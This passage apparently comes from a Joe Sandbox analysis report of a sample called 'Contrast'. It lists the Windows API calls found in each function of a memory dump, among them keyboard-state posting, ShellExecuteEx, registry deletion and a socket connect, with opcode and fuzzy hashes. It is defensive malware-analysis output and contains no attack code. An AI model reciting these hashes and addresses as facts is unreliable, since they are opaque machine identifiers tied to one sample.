                                                                                                                                        • Instruction Fuzzy Hash: A2715E30900509FFEB04CF58CC49AEE7F79FF86314F148599FA15AA251C730AA91DB64
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00FE5C40), ref: 0059BA5D
                                                                                                                                        • IsWindowEnabled.USER32(00FE5C40), ref: 0059BA69
                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0059BB4D
                                                                                                                                        • SendMessageW.USER32(00FE5C40,000000B0,?,?), ref: 0059BB84
                                                                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0059BBC1
                                                                                                                                        • GetWindowLongW.USER32(00FE5C40,000000EC), ref: 0059BBE3
                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059BBFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                        • Opcode ID: a206292dc4daa3e2c752d4dba05cea49abcff21259502588dde009d17348b1df
                                                                                                                                        • Instruction ID: f04c33bf3bf4ed16e354640b58d273c3110ac543439316ec7a16d105baf94a71
                                                                                                                                        • Opcode Fuzzy Hash: a206292dc4daa3e2c752d4dba05cea49abcff21259502588dde009d17348b1df
                                                                                                                                        • Instruction Fuzzy Hash: 8E71CF34604209AFFF209F54DA94FBA7FB6FF5A300F04445AE94597291C731AD54DB50
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0058FB31
                                                                                                                                        • _memset.LIBCMT ref: 0058FBFA
                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0058FC3F
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0058FCB6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0058FCE5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3522835683-2766056989
                                                                                                                                        • Opcode ID: f680618968d914eb9cacd402c9cca920f15f5322ada197577c3e001e8390834e
                                                                                                                                        • Instruction ID: 840b02af34a83be48a6a5b61794bda785949d5d07a84cecd4aaee891426f6f32
                                                                                                                                        • Opcode Fuzzy Hash: f680618968d914eb9cacd402c9cca920f15f5322ada197577c3e001e8390834e
                                                                                                                                        • Instruction Fuzzy Hash: 30619E74A0061ADFCB14EF54D4999AEBBF4FF89310F108469E846AB351CB30AD81CF94
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 0057178B
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 005717A0
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00571801
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057182F
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057184E
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571894
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005718B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                                                                                                                                        • Instruction ID: 25f03c0c3f1619ba440171e78561b4d822cc73f0e91cc663f03458abecc2b775
                                                                                                                                        • Opcode Fuzzy Hash: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                                                                                                                                        • Instruction Fuzzy Hash: 5E51E360904BD53DFB3646389855BBA7EE97B06700F08C589E1DD568C2C294DC88F759
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(00000000), ref: 005715A4
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 005715B9
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0057161A
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00571646
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00571663
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005716A7
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005716C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                                                                                                                                        • Instruction ID: 0cdbafd7fbbe2b2a5eeb5e43090565c51afecf161f570c145247a19a5fcd7338
                                                                                                                                        • Opcode Fuzzy Hash: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                                                                                                                                        • Instruction Fuzzy Hash: 2C5106A0514BD53DFB3687289C45BBA7EA97B46300F0CC589E0DD4A8C2D694EC98FB58
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                        • Opcode ID: aadab7085a69d55ed7698db92684b1f1b56000f7197b9795f0903ef63907076c
                                                                                                                                        • Instruction ID: 4ac147de0e69fec063bf078fd6fda601bfb8b173a511e8a8ca995cf491ff9f25
                                                                                                                                        • Opcode Fuzzy Hash: aadab7085a69d55ed7698db92684b1f1b56000f7197b9795f0903ef63907076c
                                                                                                                                        • Instruction Fuzzy Hash: D5419F65C2061975CB11FBB4C84AACFBBBCBF45310F508856F519E3122F634A71587A5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573B8A,?), ref: 00574BE0
                                                                                                                                          • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573B8A,?), ref: 00574BF9
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00573BAA
                                                                                                                                        • _wcscmp.LIBCMT ref: 00573BC6
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00573BDE
                                                                                                                                        • _wcscat.LIBCMT ref: 00573C26
                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00573C92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 1377345388-1173974218
                                                                                                                                        • Opcode ID: 151ae3466fa538c1fd334b30969f8e950329c483d3e725a91edcf752cea7edce
                                                                                                                                        • Instruction ID: 68a471e8f8b49df8cc4683bbf0adca0df23db93001fcf56a273412a75f8fcf45
                                                                                                                                        • Opcode Fuzzy Hash: 151ae3466fa538c1fd334b30969f8e950329c483d3e725a91edcf752cea7edce
                                                                                                                                        • Instruction Fuzzy Hash: F5417D7140C3459AC752EF64E445ADBBBECBF89350F40592EF48DC3191EB34D688AB52
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005978CF
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597976
                                                                                                                                        • IsMenu.USER32(?), ref: 0059798E
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005979D6
                                                                                                                                        • DrawMenuBar.USER32 ref: 005979E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                                        • Opcode ID: fdf33565cf9ac922315ad44a2edfb3084022a0c5c534d56692f989bafc89914f
                                                                                                                                        • Instruction ID: 578fdcca70629657ab24fb6f1c5a2580e4193795c07f2b2bdfa91e28caeacdac
                                                                                                                                        • Opcode Fuzzy Hash: fdf33565cf9ac922315ad44a2edfb3084022a0c5c534d56692f989bafc89914f
                                                                                                                                        • Instruction Fuzzy Hash: 5D416775A18209EFDF20DF54D884EAABBF9FB0A310F04812AE9559B250D734AD54DFA0
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00591631
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059165B
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00591712
                                                                                                                                          • Part of subcall function 00591602: RegCloseKey.ADVAPI32(?), ref: 00591678
                                                                                                                                          • Part of subcall function 00591602: FreeLibrary.KERNEL32(?), ref: 005916CA
                                                                                                                                          • Part of subcall function 00591602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005916ED
                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 005916B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 395352322-0
                                                                                                                                        • Opcode ID: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                                                                                                                                        • Instruction ID: 1fef433127720985dea57103d2b2ba0cb8e56e4419308e43dbef06a87ffcde1d
                                                                                                                                        • Opcode Fuzzy Hash: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                                                                                                                                        • Instruction Fuzzy Hash: D9313C7191011ABFDF148BA0DC89AFEBBBCFF09340F000169E502A2180EB709E499AA4
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00596911
                                                                                                                                        • GetWindowLongW.USER32(00FE5C40,000000F0), ref: 00596944
                                                                                                                                        • GetWindowLongW.USER32(00FE5C40,000000F0), ref: 00596979
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 005969AB
                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 005969D5
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005969E6
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00596A00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                        • Opcode ID: c9edf45b78dd7dbc7811c9e4034c8506f122d9fb9085c01870e79b3f0e5157eb
                                                                                                                                        • Instruction ID: 82caa3ad954701d2502a06f77f8d60a1570d1cc19810dceed5d4cd0301e13ef6
                                                                                                                                        • Opcode Fuzzy Hash: c9edf45b78dd7dbc7811c9e4034c8506f122d9fb9085c01870e79b3f0e5157eb
                                                                                                                                        • Instruction Fuzzy Hash: 41311230604155AFDF21CF18DD88F653BE1FB9A754F1811A5F9148B2B2CB72AC48EB50
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E2CA
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E2F0
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0056E2F3
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0056E311
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0056E31A
                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E33F
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0056E34D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: 2f5f27ac3742ca73b60378bcca8576f76b8e033ed1573e14b25da54cf98568e7
                                                                                                                                        • Instruction ID: 67397d94a65cf993951577f62f9e3d5757c6727744c5c5db5684d829d1f88a62
                                                                                                                                        • Opcode Fuzzy Hash: 2f5f27ac3742ca73b60378bcca8576f76b8e033ed1573e14b25da54cf98568e7
                                                                                                                                        • Instruction Fuzzy Hash: 6E21927A605219AF9F10DFA8DC89CBF7BACFB09360B048525FA14DB290D670AC459760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00588475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005868B1
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 005868C0
                                                                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005868F9
                                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00586902
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 0058690C
                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00586935
                                                                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0058694E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 910771015-0
                                                                                                                                        • Opcode ID: afbb462ab739f85d38b906ccb3cb484db704114f5a73d4772c1cfdf1f52f83a8
                                                                                                                                        • Instruction ID: 7847d08e3d8ed62c4b1201e2f9cdd699f3e29e24e3149c3a817e7282793ed756
                                                                                                                                        • Opcode Fuzzy Hash: afbb462ab739f85d38b906ccb3cb484db704114f5a73d4772c1cfdf1f52f83a8
                                                                                                                                        • Instruction Fuzzy Hash: F031B371600109AFDF10AF64DC89BBE7BA9FB45725F044029FD09AB2D1DB74AC449FA1
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E3A5
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E3CB
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0056E3CE
                                                                                                                                        • SysAllocString.OLEAUT32 ref: 0056E3EF
                                                                                                                                        • SysFreeString.OLEAUT32 ref: 0056E3F8
                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E412
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0056E420
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                        • Opcode ID: 94110059ecc920ca03be9b210cc8dbba0cc100135b60efe37104ab9ced9f05da
                                                                                                                                        • Instruction ID: f70aabf062021bab515c54ebb678b2fe7b9cf481b391f213024de1a653ad3c85
                                                                                                                                        • Opcode Fuzzy Hash: 94110059ecc920ca03be9b210cc8dbba0cc100135b60efe37104ab9ced9f05da
                                                                                                                                        • Instruction Fuzzy Hash: 6B216535605205AF9F209FB8DC89CAA7BECFB4D360B008525F915CB2A0DA70AC459764
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                                                                                                                                          • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                                                                                                                                          • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597C57
                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00597C64
                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00597C6F
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597C7E
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597C8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                        • Opcode ID: 15627f30e186d9de5aa3ae17211e56383c12873074cb2aa1c2c17f41f0d2587c
                                                                                                                                        • Instruction ID: 190aab9397bb1891d575f276e798815da16144c462bbf831af2f1f7a928917a0
                                                                                                                                        • Opcode Fuzzy Hash: 15627f30e186d9de5aa3ae17211e56383c12873074cb2aa1c2c17f41f0d2587c
                                                                                                                                        • Instruction Fuzzy Hash: ED1182B215021EBEEF159F60CC85EE77F5DFF48798F014115BA08A6090C7729C21DBA4
                                                                                                                                        APIs
                                                                                                                                        • __init_pointers.LIBCMT ref: 00539D16
                                                                                                                                          • Part of subcall function 005333B7: EncodePointer.KERNEL32(00000000), ref: 005333BA
                                                                                                                                          • Part of subcall function 005333B7: __initp_misc_winsig.LIBCMT ref: 005333D5
                                                                                                                                          • Part of subcall function 005333B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0053A0D0
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0053A0E4
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0053A0F7
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0053A10A
